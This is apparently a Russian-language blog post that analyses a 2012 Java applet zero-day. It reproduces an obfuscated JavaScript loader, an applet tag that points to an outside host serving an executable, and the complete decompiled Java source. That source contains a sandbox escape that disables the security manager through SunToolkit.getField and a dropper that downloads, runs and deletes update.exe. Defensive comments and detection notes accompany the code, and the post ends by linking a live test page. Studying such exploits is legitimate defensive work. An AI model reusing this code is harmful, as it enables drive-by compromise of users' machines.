Java 0day Стало интересно как работает, и вот: Для начала рассмотрим интересный кусок кода JavaScript защищенный обфускацией /*Encrypt By Dadong's JSXX 0.44 */ for(OUBbzls1=0,EXwldo6=true,PAhnWW4=["msie","firefox","opera"];EXwldo6;OUBbzls1++){EXwldo6=EXwldo6 && (navigator.userAgent.toLowerCase().indexOf(PAhnWW4[OUBbzls1])>-1);if(OUBbzls1==PAhnWW4.length-1)OUBbzls1=-1;}wbCQBK2="0";delete wbCQBK2;try{wbCQBK2+="0"+"0";}catch(e){NcFjn7 = eval;ldKXNGU1=unescape;}vlWWlBt3="11C6D1A508C9F33957FE826723E180764A9F855832E1FA2718C5857A1AC49216AA86EB17B688EB1BB295D859E6A98B57BAB38258F2A79814F9A09C4DFBB4DE39DFA29A3486A0873299FC306ED9897F64DD933B6AD79E706FDB98727E90855275B0B54271A88C076CA5B0426BAB787241A16B1D0DED1F3341BC361554A662721E8B7021519E6D2F10CD4B3E558B0A6767DB0E3D64DB032E45F04D6F239D4F6235624A3D75622B63633C6427455A005A4D486E407E4173547F40390C79447B467A1634726609530F1204390B1E0C5D121F0D58721F0213020F69147B02781D090A7515457B631725316B507D223B1F3F7E3A1B31686B29726C66793E3A26783A32263C40627F3D057A436F4C255E6F4C73476B5E4C582E43455E675C15163155584E6A7B1F11712E1A23437B0C68482848654734253A476D232F5A6E66614E6E6B36067F317E5F7E227E237A632924752A6E2B737B79730335576F5E79517D4260406157774D635E435F7C41010A284B4B4A79520E527D2E577D532E163245274F2D156F192F436F253C516C3F67567C3B6F1F33727A5D636163607B657F21246A65686B6D7639442D3E7712201A25172456675F7D472A5F41436B08677D567C08407751595F2761175D68200672137B403E5E35120D453F2438582D276C53743B2308373C69486E3D2C50726F757F7674772E727C7D6A696F703B462F0027466654684E6E06624E6C0B320F0D7F527D637740050811653224597030574D2A3C3B4E4024593D452A50380276303944606E20086B38381A2475073667617C60726B7C20786C6F75796379394C7570240B775067486C43434179476F5F540629574B566B1E010D1B37485579345D5B70311A204D2D4168473D4C2F44350326476F202855682660576F352101025A7A5F6122772D796275223B37382E706D6923467C542E446441655F7F6D644A734962470A1771475658714F0D112332245B732D56214469412D403F52750A7D0B7A0E3A4F5A576A2866556D646E5D642962482C223C7523262949136F7926796D7E6240627D384C62473F0B7956764179
5E245B415C2C0E29387556465277590259752555033C264227107909745E35443204162F204A75322E516B29774529770530683F625A72663E31727255326F7871286A7A7966016A4961487B456B476C0A240D76587843181F3F584D1A755A180C36514B48332E5725542E58230B2353664D375B6E053A4F5A576A2866556D64755D790F7E4863696C3561613A667B6634643F7B75354E6567395F7C4B7A4079496B4C73467C130915033F435D7C5D4952384E494E5B35444C7727413647611A354F6F1068493E2E2942622D7957653D755F29653337053763507763746C646360076F7E6A237D7B682B0B304273053A06331F220A21141326685C41457D5248403A59455C61114F4C6C265C24632F5F2840635D27462B5F28053A4F5A4D084C3939032E6354683A6F1C62427A0565322949136C732478787F6C4A797504172F2F084D7D4A6359790A675473444C7F6205293422527351494E7F61716D4F216474194432224321593E4F7118166D6C144A023C450E526E206D4E6A7079465D435616733E2F4B116E7D267A7A796E67794E69132D290E4F7F446D5B7B0C4A6544557A54150F19314E5D745A5A593C0A43167329037F29415E2D442A4A290C74361346347D0F3E6D2F6A5D792B2A7869444206463C2949136C732478787F6C45596A1E4E23190F237C436A48684F2A474C79595966462102253C7258405F6E24105C5F2C7903652D007D2B47582F4634342B0E4D274658697F3F3B01286D566A24691E7940613A4267517E2007122E7A62793A46324C646C4E6A437E2B1305257A4960565655304563426E7E7C702904233678265E2554221621613E4B7C13423428496D27245525246B626D2E727D39750736756562256161320A574C5F7D26011028447C7B24403464646F7742767B2811073B444B62505057324B447744051737102555527B315162511B521F481C7079115C4A2A4B6F21745727034D644F7C333705346952767675627A454C27533E2347156A7922466645205074675569511A33221448695F47447517636C63574E572E04233678265E25542216146523541F7F7B05412665273C557123227B5C086442613D3B071C0A6A25796166213961750D55792D772C1A7A35497156670968506A7B2F11073B444B625050573270715554081737102555527B31516274214A0054340D71275B242B4266306512443A707E493F3A01025A685B7F67642737605B207F5B28711204782B4F775465076C727448281305257A4960565655307B6A46516D120315354A597026462500224636452A0B7325455A29406436351075026D646839360300447E4E687B4D2F796877276D4F773A7F6D7D290939252D467556614130432F56612700";sBtEp6="function 
kikT2(){meSjBJF7=Math.PI;sRjYnQL3=Math.tan;ASQdP6=parseInt;XXCoPJ0='length';FfFodpV4='test';eEuq4='replace';uxNAFTd8=ASQdP6(~((~meSjBJF7&~meSjBJF7)|((meSjBJF7&meSjBJF7)|(~meSjBJF7&meSjBJF7)&(meSjBJF7&~meSjBJF7))));Dkni4=ASQdP6(((uxNAFTd8&uxNAFTd8)|(~uxNAFTd8&uxNAFTd8)&(uxNAFTd8&~uxNAFTd8)|(~uxNAFTd8&~uxNAFTd8))&1);/*Encrypt By Dadong's JSXX 0.44 VIP*/FVfejc3=Dkni4<>>7)+sBtEp6.charCodeAt(dItNk7);rlAR8+=Dkni4;IqVSn5>>>=0;for(dItNk7=uxNAFTd8,rEvzEVH1=Dkni4;dItNk7=(1<<3)){mCXaH4=dItNk7%(1<<3);}else {mCXaH4=dItNk7;}KIRD0=ASQdP6('0x'+IqVSn5.toString(Dkni4<<4).substr(mCXaH4,2))+rEvzEVH1;if(\/^(\\d{4})\/g[FfFodpV4](KIRD0+744))KIRD0%=82;utCv1+=DxDLFS8(ASQdP6(uxNAFTd8+ldKXNGU1('x')+vlWWlBt3.charAt(dItNk7)+vlWWlBt3.charAt(dItNk7+ASQdP6(Dkni4)))^KIRD0);}try{new function(){bAiMAGd8(utCv1);}}catch(e){try{new function(){biVddtE4=parseInt;sRjYnQL3(utCv1);}}catch(e) {window.location='.';}}}try{NcFjn7('kikT2();')}catch(e) {try{rlAR8=uxNAFTd8;NcFjn7('kikT2();');}catch(e){alert('ern');}}";jBqxUaE8 = NcFjn7(NcFjn7);jBqxUaE8(sBtEp6); Все прелестно, парочка Alert'ов дает нам результат: Далее идет забавный кусок HTML кода: body
body /body applet width="256" height="256" archive="applet.jar" code="cve2012xxxx.Gondvv.class" xiaomaolv="http://eas7.ru/hack/notepad.exe" bn="woyouyizhixiaomaolv" si="conglaiyebuqi" bs="748" /body Внутри applet.jar два файла, которые отлично конвертируюся в исходный код (JAD'ом):
Gondvv.class:
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

// Referenced classes of package cve2012xxxx:
// Gondzz

/**
 * Stage one of the applet: a Java sandbox escape followed by a hand-off to the dropper.
 *
 * Decompiled with JAD, so class literals are printed as {@code java/lang/System}
 * (read: {@code System.class}) and locals carry generated names.
 *
 * Read from a defender's seat: no browser bug is involved. The applet uses only
 * {@code java.beans.Expression} / {@code java.beans.Statement} reflection to reach the
 * JDK-internal {@code sun.awt.SunToolkit.getField}, overwrites a private field on a
 * {@code Statement}, and then calls {@code System.setSecurityManager(null)}. An applet
 * that touches {@code sun.awt.SunToolkit} or the {@code acc} field of
 * {@code java.beans.Statement} is a high-confidence signature for this technique; the
 * mitigation the post itself recommends - disabling the browser Java plug-in - removes
 * the whole attack surface.
 */
public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    /**
     * Turns the security manager off; this method is the entire sandbox escape.
     *
     * Steps, as written:
     * 1. {@code new Statement(System.class, "setSecurityManager", new Object[1])} is a
     *    deferred call to {@code System.setSecurityManager} with a single {@code null}
     *    argument ({@code new Object[1]} is a one-element array holding {@code null}).
     * 2. An {@link AccessControlContext} is built from one {@link ProtectionDomain}
     *    that carries {@link AllPermission} and a {@code file:///} code source with no
     *    certificates.
     * 3. {@link #SetField} overwrites the private {@code acc} field of the
     *    {@code Statement} with that context.
     * 4. {@code execute()} runs the deferred call under whatever context {@code acc}
     *    now holds (that is why the field is replaced first), so the sandboxed applet
     *    ends up invoking {@code setSecurityManager(null)} with all permissions.
     *
     * @throws Throwable anything the reflective calls raise; a refusal here means the
     *         runtime does not let the applet reach {@code SunToolkit} or the field,
     *         and {@link #init} prints it to the Java console
     */
    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(java/lang/System, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        // Private field write via the JDK-internal helper; see SetField.
        SetField(java/beans/Statement, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    /**
     * Loads a class by name through {@code java.beans.Expression} instead of calling
     * {@code Class.forName} directly.
     *
     * The indirection is the point: the only caller asks for {@code sun.awt.SunToolkit},
     * a JDK-internal class an applet is not meant to see, and presumably the beans
     * reflection path is what lets the lookup succeed where a direct reference would be
     * refused - confirm against the affected runtime's access checks before relying on
     * that reading.
     *
     * @param paramString fully qualified class name
     * @return the loaded class
     * @throws Throwable if the expression cannot be evaluated
     */
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(java/lang/Class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    /**
     * Writes {@code paramObject2} into the field named {@code paramString} of
     * {@code paramClass} on the instance {@code paramObject1}, bypassing visibility.
     *
     * It asks {@code sun.awt.SunToolkit.getField(Class, String)} for the {@link Field}
     * and then calls {@code set} without ever calling {@code setAccessible} itself, so
     * the internal helper must already hand the field back with access checks disabled.
     * This is the primitive that lets a private JDK field ({@code Statement.acc}) be
     * replaced.
     *
     * @param paramClass   class that declares the field
     * @param paramString  field name
     * @param paramObject1 instance to modify
     * @param paramObject2 new field value
     * @throws Throwable if the internal lookup or the write fails
     */
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    /**
     * Applet entry point: escape the sandbox, then dispatch the dropper.
     *
     * The parameter names ({@code bn}, {@code xiaomaolv}, {@code si}, {@code bs}) match
     * the applet tag quoted above; {@code xiaomaolv} is the download URL, the other three
     * are the gate values {@link Gondzz#xrun} checks. {@code xrun} is only reached when
     * {@code os.name} contains "Windows". Every failure - a runtime that refuses
     * {@link #disableSecurity}, or a missing {@code bs} making {@code Integer.valueOf}
     * throw - is reported with {@code printStackTrace}, which lands in the Java console
     * and is worth looking for when triaging a suspicious page.
     */
    public void init()
    {
        try
        {
            disableSecurity();
            String s1 = getParameter("bn");
            String s = getParameter("xiaomaolv");
            String s2 = getParameter("si");
            String s3 = getParameter("bs");
            String str1 = System.getProperty("os.name");
            if(str1.indexOf("Windows") >= 0)
                Gondzz.xrun(s, s1, s2, Integer.valueOf(s3));
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    /**
     * The only thing the user sees: the word "Loading" drawn in the applet area.
     */
    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
Gondzz.class
package cve2012xxxx;

import java.io.*;
import java.net.URL;
import java.net.URLConnection;

/**
 * Stage two: a download-and-execute dropper, called by {@link Gondvv#init} once the
 * security manager is gone.
 *
 * Artifacts a defender can key on: a file named {@code update.exe} written to
 * {@code java.io.tmpdir}, a child process spawned from the Java plug-in process with
 * that path (preceded by {@code chmod 755} on non-Windows), and the file being deleted
 * immediately afterwards - so detection has to rely on file-write and process-creation
 * telemetry rather than on finding the binary later. Every exception in this class is
 * swallowed, so nothing is logged on failure.
 */
public class Gondzz
{

    public Gondzz()
    {
    }

    /**
     * Downloads the payload and runs it, but only when the applet parameters carry the
     * expected magic values.
     *
     * Gate: {@code bn} must start with {@code "woyouyizhixiaomaol"}, {@code si} must start
     * with {@code "conglaiyebuqi"}, and {@code bs} must equal {@code 748} - exactly the
     * values in the applet tag above, so the check only keeps the dropper inert when the
     * class is loaded outside the intended page (e.g. by an analyst). The early return
     * fires only when {@code xiaomaolv} and {@code bn} are both {@code null}; a single
     * {@code null} surfaces as an NPE that the catch block swallows.
     *
     * On a match the file {@code java.io.tmpdir + File.separator + "update.exe"} is
     * fetched from {@code xiaomaolv}, made executable with {@code chmod 755} when
     * {@code os.name} lacks "Windows" (unreachable through {@link Gondvv#init}, which only
     * calls this on Windows), executed synchronously and then deleted.
     *
     * @param xiaomaolv download URL
     * @param bn        first gate string (prefix-checked)
     * @param si        second gate string (prefix-checked)
     * @param bs        numeric gate, must be 748
     * @return always {@code null}; errors are swallowed
     * @throws Exception declared, but nothing in the body propagates
     */
    public static Object xrun(String xiaomaolv, String bn, String si, Integer bs)
        throws Exception
    {
        if(xiaomaolv == null && bn == null)
            return null;
        try
        {
            String k1 = "woyouyizhixiaomaol";
            String k2 = "conglaiyebuqi";
            String str1 = System.getProperty("os.name");
            if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
            {
                Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
                downFile((String)localObject1, xiaomaolv);
                if(str1.indexOf("Windows") < 0)
                    exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
                exec((String)localObject1);
                // Removes the on-disk artifact right after execution.
                (new File((String)localObject1)).delete();
            }
        }
        catch(Exception exception) { }
        return null;
    }

    /**
     * Runs {@code paramString} via {@code Runtime.exec(String)} and blocks until it exits.
     *
     * The {@code if(localProcess != null);} line is an empty statement - decompiler residue
     * or a leftover - so the {@code waitFor} call is unconditional. Failures are swallowed
     * and {@code null} is returned in that case.
     *
     * @param paramString command line, tokenised by {@code Runtime.exec}
     * @return the process, or {@code null} if it could not be started
     */
    public static Process exec(String paramString)
    {
        Process localProcess = null;
        try
        {
            localProcess = Runtime.getRuntime().exec(paramString);
            if(localProcess != null);
            localProcess.waitFor();
        }
        catch(Exception exception) { }
        return localProcess;
    }

    /**
     * Fetches {@code paramString2} into the file {@code paramString1}.
     *
     * Allocates a buffer sized from the response's {@code Content-Length}, reads until the
     * buffer is full or EOF, then writes it out in one go. {@code connayi} is an unused
     * local. All exceptions are swallowed, so a failed or partial download is
     * indistinguishable from success to the caller.
     *
     * @param paramString1 destination path
     * @param paramString2 URL to download
     */
    public static void downFile(String paramString1, String paramString2)
    {
        try
        {
            FileOutputStream localFileOutputStream = new FileOutputStream(paramString1);
            URL localURL = new URL(paramString2);
            String connayi = "xx";
            URLConnection localURLConnection = localURL.openConnection();
            int i = localURLConnection.getContentLength();
            InputStream localInputStream = localURLConnection.getInputStream();
            BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream);
            byte arrayOfByte[] = new byte[i];
            int j = 0;
            for(int k = 0; k < i; k += j)
            {
                j = localBufferedInputStream.read(arrayOfByte, k, arrayOfByte.length - k);
                if(j == -1)
                    break;
            }
            localBufferedInputStream.close();
            localFileOutputStream.write(arrayOfByte);
            localFileOutputStream.close();
        }
        catch(Exception exception) { }
    }
}
Вот собственно и весь exploit, патчей пока нет, всем рекомендуется отключить Java:))) Проверила на себя, предварительно проверив чистоту кода, кому интересно развлечся можну тут: http://eas7.ru/hack/java.html - запустится notepad блокнот.